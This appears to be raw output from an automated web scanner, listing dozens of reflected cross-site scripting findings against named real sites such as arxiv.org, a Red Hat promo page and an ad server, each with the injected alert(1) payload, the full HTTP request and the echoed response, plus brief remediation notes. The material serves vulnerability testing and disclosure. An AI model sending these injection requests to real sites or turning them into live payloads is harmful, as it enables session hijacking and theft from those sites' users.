HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 509 Cache-Control: no-cache Pragma: no-cache Date: Mon, 15 Nov 2010 22:44:42 GMT Expires: Mon, 15 Nov 2010 22:44:42 GMT Connection: close
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1998f'%3balert(1)//5a4b71d2db4 was submitted in the pg parameter. This input was echoed as 1998f';alert(1)//5a4b71d2db4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.slashdot/polls_p1_leader;pg=pollBooth;logged_in=0;dcopt=ist;tile=1998f'%3balert(1)//5a4b71d2db4 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 506 Cache-Control: no-cache Pragma: no-cache Date: Mon, 15 Nov 2010 22:44:42 GMT Expires: Mon, 15 Nov 2010 22:44:42 GMT Connection: close
1.22. http://ad.vulnerable.ad.partner/adj/ostg.slashdot/polls_p32_upper_poll_spons [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.vulnerable.ad.partner
Path:
/adj/ostg.slashdot/polls_p32_upper_poll_spons
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40746'-alert(1)-'60e1009256b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.slashdot/polls_p32_upper_poll_spons?40746'-alert(1)-'60e1009256b=1 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 466 Cache-Control: no-cache Pragma: no-cache Date: Mon, 15 Nov 2010 22:44:40 GMT Expires: Mon, 15 Nov 2010 22:44:40 GMT Connection: close
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ec18'%3balert(1)//8aee150141a was submitted in the pg parameter. This input was echoed as 2ec18';alert(1)//8aee150141a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.slashdot/polls_p32_upper_poll_spons;pg=index;logged_in=0;tile=2ec18'%3balert(1)//8aee150141a HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 490 Cache-Control: no-cache Pragma: no-cache Date: Mon, 15 Nov 2010 22:44:41 GMT Expires: Mon, 15 Nov 2010 22:44:41 GMT Connection: close
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73111'-alert(1)-'fb75417c79f was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5227 Cache-Control: no-cache Pragma: no-cache Date: Mon, 15 Nov 2010 22:44:42 GMT Expires: Mon, 15 Nov 2010 22:44:42 GMT
document.write('\n<!-- Copyright DoubleClick Inc., All rights reserved. -->\n<!-- This code was autogenerated @ Fri Nov 05 18:11:19 EDT 2010 -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 4AECmALoB7gCGMACAcgC-Y67FOACAOoCFUJlYm9fSG9tZV9BVEZfMzAweDI1MJAD6AKYA_ABqAMB0QNru26BT2N3COgDwgToA4oD6AP4A_UDAAKQgeAEAQ&num=1&sig=AGiWqtw-xQgtF7RsZmkKhy9DTH7WXGMDDg&client=ca-pub-1767463503520867&adurl=73111'-alert(1)-'fb75417c79fhttp://www.erollover.com/Home/Index/WatchOurAd'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http://s0.2mdn.net/2965015/er300x250Av2.swf'; var dcminversion = '8'; var dccreativeheight = '25 ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6183c'-alert(1)-'ab78e5025ad was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 22:44:23 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5251
document.write('\n<!-- Copyright DoubleClick Inc., All rights reserved. -->\n<!-- This code was autogenerated @ Fri Nov 05 18:11:19 EDT 2010 -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... MmG9IbIo5AZsgEMd3d3LmJlYm8uY29tugEKMzAweDI1MF9hc8gBCdoBFGh0dHA6Ly93d3cuYmViby5jb20v4AECmALoB7gCGMACAcgC-Y67FOACAOoCFUJlYm9fSG9tZV9BVEZfMzAweDI1MJAD6AKYA_ABqAMB0QNru26BT2N3COgDwgToA4oD6AP4A_UDAAKQgeAEAQ6183c'-alert(1)-'ab78e5025ad&num=1&sig=AGiWqtw-xQgtF7RsZmkKhy9DTH7WXGMDDg&client=ca-pub-1767463503520867&adurl=http%3a%2f%2fwww.erollover.com/Home/Index/WatchOurAd'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http:// ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29d51'-alert(1)-'06aeb8d7ca6 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 22:44:37 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5251
document.write('\n<!-- Copyright DoubleClick Inc., All rights reserved. -->\n<!-- This code was autogenerated @ Fri Nov 05 18:11:19 EDT 2010 -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... y5jb20v4AECmALoB7gCGMACAcgC-Y67FOACAOoCFUJlYm9fSG9tZV9BVEZfMzAweDI1MJAD6AKYA_ABqAMB0QNru26BT2N3COgDwgToA4oD6AP4A_UDAAKQgeAEAQ&num=1&sig=AGiWqtw-xQgtF7RsZmkKhy9DTH7WXGMDDg&client=ca-pub-176746350352086729d51'-alert(1)-'06aeb8d7ca6&adurl=http%3a%2f%2fwww.erollover.com/Home/Index/WatchOurAd'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http://s0.2mdn.net/2965015/er300x250Av2.swf'; var dcminversion = '8'; var dccreativ ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79c4e'-alert(1)-'3f7dca77d5a was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 22:44:28 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5249
document.write('\n<!-- Copyright DoubleClick Inc., All rights reserved. -->\n<!-- This code was autogenerated @ Fri Nov 05 18:13:19 EDT 2010 -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... Io5AZsgEMd3d3LmJlYm8uY29tugEKMzAweDI1MF9hc8gBCdoBFGh0dHA6Ly93d3cuYmViby5jb20v4AECmALoB7gCGMACAcgC-Y67FOACAOoCFUJlYm9fSG9tZV9BVEZfMzAweDI1MJAD6AKYA_ABqAMB0QNru26BT2N3COgDwgToA4oD6AP4A_UDAAKQgeAEAQ&num=179c4e'-alert(1)-'3f7dca77d5a&sig=AGiWqtw-xQgtF7RsZmkKhy9DTH7WXGMDDg&client=ca-pub-1767463503520867&adurl=http%3a%2f%2fwww.erollover.com/Home/Index/WatchOurAd'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http://s0.2md ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba805'-alert(1)-'0de684079bd was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 22:44:32 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5249
document.write('\n<!-- Copyright DoubleClick Inc., All rights reserved. -->\n<!-- This code was autogenerated @ Fri Nov 05 18:13:19 EDT 2010 -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 9hc8gBCdoBFGh0dHA6Ly93d3cuYmViby5jb20v4AECmALoB7gCGMACAcgC-Y67FOACAOoCFUJlYm9fSG9tZV9BVEZfMzAweDI1MJAD6AKYA_ABqAMB0QNru26BT2N3COgDwgToA4oD6AP4A_UDAAKQgeAEAQ&num=1&sig=AGiWqtw-xQgtF7RsZmkKhy9DTH7WXGMDDgba805'-alert(1)-'0de684079bd&client=ca-pub-1767463503520867&adurl=http%3a%2f%2fwww.erollover.com/Home/Index/WatchOurAd'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http://s0.2mdn.net/2965015/er300x250C.swf'; var dcmi ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de6c7'-alert(1)-'a55fcca6344 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 22:44:19 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5251
document.write('\n<!-- Copyright DoubleClick Inc., All rights reserved. -->\n<!-- This code was autogenerated @ Fri Nov 05 18:11:19 EDT 2010 -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... dvurl = 'http://www.erollover.com/Home/Index/WatchOurAd'; var alttext = ''; var dcgif = ''; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://adclick.g.vulnerable.ad.partner/aclk?sa=lde6c7'-alert(1)-'a55fcca6344&ai=BcG5anLLhTIhL1oHpBpe51MsOwbvF3wG5guf4GJGc5ddBABABGAEgmKCkGzgAYMmG9IbIo5AZsgEMd3d3LmJlYm8uY29tugEKMzAweDI1MF9hc8gBCdoBFGh0dHA6Ly93d3cuYmViby5jb20v4AECmALoB7gCGMACAcgC-Y67FOACAOoCFUJlYm9fSG9tZV9BVEZf ...[SNIP]...
The value of the flash request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3742e'%3balert(1)//eef01ef540e was submitted in the flash parameter. This input was echoed as 3742e';alert(1)//eef01ef540e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16ca7'-alert(1)-'492c21af936 was submitted in the redir parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the time request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41bf7'%3balert(1)//d6150544e3a was submitted in the time parameter. This input was echoed as 41bf7';alert(1)//d6150544e3a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.33. http://agenturtreffen-mitteldeutschland.de/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://agenturtreffen-mitteldeutschland.de
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bccef"><script>alert(1)</script>0cf1d5bb9cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bccef\\\"><script>alert(1)</script>0cf1d5bb9cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?bccef"><script>alert(1)</script>0cf1d5bb9cc=1 HTTP/1.1 Host: agenturtreffen-mitteldeutschland.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 22:41:29 GMT Server: Apache X-Powered-By: PHP/5.2.12-nmm2 X-Pingback: http://agenturtreffen-mitteldeutschland.de/xmlrpc.php Cache-Control: public Expires: Mon, 15 Nov 2010 22:42:29 GMT X-UA-Compatible: IE=Edge,chrome=1 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 36032
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/x ...[SNIP]... <a href="http://agenturtreffen-mitteldeutschland.de/page/2/?bccef\\\"><script>alert(1)</script>0cf1d5bb9cc=1"> ...[SNIP]...
1.34. http://apac.redhat.com/promo/roadtour/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://apac.redhat.com
Path:
/promo/roadtour/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc531"><script>alert(1)</script>9e597a2827f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /promo/roadtour/?cc531"><script>alert(1)</script>9e597a2827f=1 HTTP/1.1 Host: apac.redhat.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 22:41:32 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 21588
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>Red Hat Asia Pacific</ ...[SNIP]... <iframe style='height:25px;width:170px;' src="http://www.facebook.com/plugins/like.php?href=http://apac.redhat.com/promo/roadtour/?cc531"><script>alert(1)</script>9e597a2827f=1&layout=standard&show_faces=false&width=170&font=arial&colorscheme=light&height=30" frameborder="0"> ...[SNIP]...
The value of the k request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8fce'%3balert(1)//958a17cf03f was submitted in the k parameter. This input was echoed as b8fce';alert(1)//958a17cf03f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /papi/challenge.script?k=L9oIXIWrUZosdnonwORaAY-QZ-w5sMIvb8fce'%3balert(1)//958a17cf03f HTTP/1.1 Host: api.solvemedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 22:41:40 GMT Server: Apache Cache-Control: public,max-age=86400 Expires: Tue, 16 Nov 2010 22:41:40 GMT Last-Modified: Fri, 16 Jul 2010 14:54:36 GMT Connection: close Content-Type: text/javascript; charset=utf-8 Content-Length: 520
var ACPuzzleOptions; var ACPuzzleInfo = { ckey: 'L9oIXIWrUZosdnonwORaAY-QZ-w5sMIvb8fce';alert(1)//958a17cf03f', apiserver: '//api.solvemedia.com', mediaserver: '//api.solvemedia.com', lang: 'en', size: 'standard', theme: 'white', type: 'img',
...[SNIP]...
1.36. http://argouml.tigris.org/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://argouml.tigris.org
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14671"><script>alert(1)</script>d9479979be7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?14671"><script>alert(1)</script>d9479979be7=1 HTTP/1.1 Host: argouml.tigris.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cba2e<script>alert(1)</script>5bf21d381dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /licencecba2e<script>alert(1)</script>5bf21d381dd/lalgb.html HTTP/1.1 Host: artlibre.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:44:21 GMT Server: VHFFS / Apache/1.3.34 (Unix) mod_lo/1.0 PHP/4.4.4 with Hardening-Patch mod_ssl/2.8.25 OpenSSL/0.9.8b mod_chroot/0.5 X-Powered-By: PHP/4.4.4 with Hardening-Patch X-Pingback: http://artlibre.org/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 22:44:22 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 6014
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5fc96<script>alert(1)</script>6c3a630078b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /licence/5fc96<script>alert(1)</script>6c3a630078b HTTP/1.1 Host: artlibre.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:44:24 GMT Server: VHFFS / Apache/1.3.34 (Unix) mod_lo/1.0 PHP/4.4.4 with Hardening-Patch mod_ssl/2.8.25 OpenSSL/0.9.8b mod_chroot/0.5 X-Powered-By: PHP/4.4.4 with Hardening-Patch X-Pingback: http://artlibre.org/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 22:44:25 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 6004
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8b662<script>alert(1)</script>16f7b91092f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/cs.LO8b662<script>alert(1)</script>16f7b91092f/9809032 HTTP/1.1 Host: arxiv.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:47:08 GMT Server: Apache Set-Cookie: browser=174.122.23.218.1289861228268265; path=/; max-age=946080000; domain=.arxiv.org Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1587
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <h1>Paper identifier 'cs.LO8b662<script>alert(1)</script>16f7b91092f/9809032' not recognized</h2> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 76147</title><script>alert(1)</script>6f17836f4ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/cs.LO76147</title><script>alert(1)</script>6f17836f4ff/9809032 HTTP/1.1 Host: arxiv.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:47:09 GMT Server: Apache Set-Cookie: browser=174.122.23.218.1289861229652509; path=/; max-age=946080000; domain=.arxiv.org Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1838
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <title>[cs.LO76147</title><script>alert(1)</script>6f17836f4ff/9809032] Bad paper identifier</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 637f8</title>121218a33f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open <TITLE> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /abs/cs.LO637f8</title>121218a33f2/9809032 HTTP/1.1 Host: arxiv.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:47:22 GMT Server: Apache Set-Cookie: browser=174.122.23.218.1289861242763760; path=/; max-age=946080000; domain=.arxiv.org Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1553
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <title>[cs.LO637f8</title>121218a33f2/9809032] Bad paper identifier</title> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload a1683</title><script>alert(1)</script>10f40271a6b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/cs.LO/9809032a1683</title><script>alert(1)</script>10f40271a6b HTTP/1.1 Host: arxiv.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:47:11 GMT Server: Apache Set-Cookie: browser=174.122.23.218.1289861231576105; path=/; max-age=946080000; domain=.arxiv.org Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1838
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <title>[cs.LO/9809032a1683</title><script>alert(1)</script>10f40271a6b] Bad paper identifier</title> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e3721<script>alert(1)</script>41fe0906461 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/cs.LO/9809032e3721<script>alert(1)</script>41fe0906461 HTTP/1.1 Host: arxiv.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:47:10 GMT Server: Apache Set-Cookie: browser=174.122.23.218.1289861230170102; path=/; max-age=946080000; domain=.arxiv.org Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1814
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <h1>Paper identifier 'cs.LO/9809032e3721<script>alert(1)</script>41fe0906461' not recognized</h2> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 75dc4</title><script>alert(1)</script>4425799c3a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/cs.LO75dc4</title><script>alert(1)</script>4425799c3a/9809032. HTTP/1.1 Host: arxiv.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:47:09 GMT Server: Apache Set-Cookie: browser=174.122.23.218.1289861229898345; path=/; max-age=946080000; domain=.arxiv.org Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1603
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <title>[cs.LO75dc4</title><script>alert(1)</script>4425799c3a/9809032.] Bad paper identifier</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c1ba4<script>alert(1)</script>38523436cf0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/cs.LOc1ba4<script>alert(1)</script>38523436cf0/9809032. HTTP/1.1 Host: arxiv.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:47:08 GMT Server: Apache Set-Cookie: browser=174.122.23.218.1289861228727687; path=/; max-age=946080000; domain=.arxiv.org Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1589
